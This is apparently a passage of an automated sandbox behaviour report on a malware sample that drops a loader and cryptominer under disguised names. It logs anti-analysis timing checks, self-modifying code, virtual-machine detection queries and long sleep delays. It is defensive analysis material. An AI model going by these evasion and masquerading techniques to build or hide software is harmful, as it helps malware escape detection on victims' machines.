                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60236 second address: 4C6025C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624C75306h 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6025C second address: 4C6027F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FF624B4E7DBh 0x00000012 pop eax 0x00000013 movsx edx, ax 0x00000016 popad 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC08DC second address: 4CC091C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+0Ch] 0x0000000d pushad 0x0000000e mov edi, 42074EF8h 0x00000013 call 00007FF624C75301h 0x00000018 call 00007FF624C75300h 0x0000001d pop ecx 0x0000001e pop ebx 0x0000001f popad 0x00000020 push dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC091C second address: 4CC0931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E1h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0931 second address: 4CC096B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FF624C752F9h 0x0000000d jmp 00007FF624C752FDh 0x00000012 push eax 0x00000013 jmp 00007FF624C75301h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC096B second address: 4CC096F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC096F second address: 4CC0975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0975 second address: 4CC09DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF624B4E7DAh 0x00000014 or ecx, 6A234FA8h 0x0000001a jmp 00007FF624B4E7DBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FF624B4E7E8h 0x00000026 adc ecx, 2A5FC208h 0x0000002c jmp 00007FF624B4E7DBh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70598 second address: 4C70612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushfd 0x00000006 jmp 00007FF624C752FBh 0x0000000b or ax, 51EEh 0x00000010 jmp 00007FF624C75309h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov al, dh 0x0000001d movzx esi, di 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007FF624C752FBh 0x00000027 mov ebp, esp 0x00000029 jmp 00007FF624C75306h 0x0000002e push FFFFFFFEh 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FF624C75307h 0x00000037 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70612 second address: 4C7069B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FF624B4E7D9h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF624B4E7DCh 0x00000015 or si, 5888h 0x0000001a jmp 00007FF624B4E7DBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FF624B4E7E8h 0x00000026 sbb si, BAE8h 0x0000002b jmp 00007FF624B4E7DBh 0x00000030 popfd 0x00000031 popad 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 jmp 00007FF624B4E7E2h 0x0000003b mov edx, esi 0x0000003d popad 0x0000003e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7069B second address: 4C70756 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e mov si, dx 0x00000011 mov bh, 12h 0x00000013 popad 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 mov edx, 38A5083Eh 0x0000001c pushfd 0x0000001d jmp 00007FF624C752FFh 0x00000022 or ah, FFFFFFEEh 0x00000025 jmp 00007FF624C75309h 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 jmp 00007FF624C75301h 0x00000035 pop eax 0x00000036 pushad 0x00000037 call 00007FF624C752FCh 0x0000003c call 00007FF624C75302h 0x00000041 pop ecx 0x00000042 pop edx 0x00000043 mov di, si 0x00000046 popad 0x00000047 call 00007FF624C752F9h 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF624C75309h 0x00000053 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70756 second address: 4C70766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DCh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70766 second address: 4C707AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF624C75309h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF624C75303h 0x0000001e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C707AC second address: 4C707B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9CED45 instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B7000E instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B70386 instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B97678 instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B75F1A instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BF1ABC instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: C8ED45 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: E3000E instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: E30386 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: E57678 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: E35F1A instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: EB1ABC instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeMemory allocated: 850000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeMemory allocated: 1B410000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeMemory allocated: 850000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeMemory allocated: 1AFA0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\services64.exeMemory allocated: 17C0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\services64.exeMemory allocated: 1B8B0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\services64.exeMemory allocated: C60000 memory reserve | memory write watch
                        Source: C:\Windows\System32\services64.exeMemory allocated: 1B3C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeMemory allocated: 2ED0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeMemory allocated: 1B5C0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeMemory allocated: CA0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeMemory allocated: 1B220000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeMemory allocated: D40000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeMemory allocated: 1B3E0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeMemory allocated: CB0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04CC0942 rdtsc 0_2_04CC0942
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00401B3F GetCurrentProcessId,CreateToolhelp32Snapshot,fwrite,Process32First,_stricmp,Process32Next,CloseHandle,CloseHandle,7_2_00401B3F
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\services64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\services64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599854
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599716
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599534
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599285
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599127
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598988
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598850
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598734
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598625
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598515
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599803
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599687
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599552
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599436
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599327
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599217
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599108
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 632
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 367
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 641
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 570
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2894
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6915
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7641
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1925
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8008
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1292
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7248
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2363
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8090
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8107
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8396
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeWindow / User API: threadDelayed 1418
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8604
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 492
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeWindow / User API: threadDelayed 579
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeWindow / User API: threadDelayed 1064
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9208
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6049
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3564
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7996
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1373
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6750
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2914
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeDropped PE file which has not been started: C:\Windows\System32\Microsoft\Libs\WR64.sys
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3132Thread sleep time: -54027s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6036Thread sleep count: 632 > 30
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6036Thread sleep time: -1264632s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3568Thread sleep count: 367 > 30
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3568Thread sleep time: -11010000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4852Thread sleep time: -1080000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3180Thread sleep count: 641 > 30
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3180Thread sleep time: -1282641s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1544Thread sleep count: 570 > 30
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1544Thread sleep time: -1140570s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe TID: 5944Thread sleep time: -180000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe TID: 7212Thread sleep count: 34 > 30
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe TID: 7212Thread sleep time: -1020000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe TID: 7696Thread sleep time: -570000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe TID: 7532Thread sleep time: -120000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe TID: 1436Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep count: 2894 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep count: 6915 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 7641 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4600Thread sleep count: 1925 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 2740Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep count: 8008 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5012Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep count: 1292 > 30
                        Source: C:\Windows\System32\services64.exe TID: 5960Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1236Thread sleep count: 7248 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3896Thread sleep count: 2363 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\services64.exe TID: 888Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4304Thread sleep count: 8090 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1704Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4228Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep count: 8107 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2784Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020Thread sleep count: 8396 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260Thread sleep count: 133 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6192Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -600000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6412Thread sleep count: 1418 > 30
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -599854s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -599716s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -599534s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -599285s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -599127s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -598988s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -598850s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -598734s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -598625s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -598515s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6904Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6748Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 6868Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 3748Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep count: 8604 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5320Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep count: 492 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -600000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6452Thread sleep count: 579 > 30
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -599803s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6452Thread sleep count: 1064 > 30
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -599687s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -599552s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -599436s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -599327s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -599217s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -599108s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 2812Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 7820Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 7896Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 1984Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2412Thread sleep count: 9208 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep count: 6049 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep count: 3564 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6712Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008Thread sleep count: 7996 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200Thread sleep count: 1373 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4364Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1240Thread sleep count: 6750 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1240Thread sleep count: 2914 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 396Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
